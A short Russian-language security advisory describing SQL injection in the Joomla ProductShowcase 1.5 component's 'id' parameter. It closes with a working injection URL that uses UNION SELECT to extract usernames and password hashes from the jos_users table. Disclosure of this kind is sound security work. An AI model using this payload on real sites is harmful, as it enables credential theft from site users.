Программа: Joomla Component ProductShowcase 1.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
index.php?option=com_productshowcase&Itemid= S@BUN&action=details&id=-99999/**/union/**/select/* */0,concat(username,0x3a,password),concat(username,0x3a,password), 0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
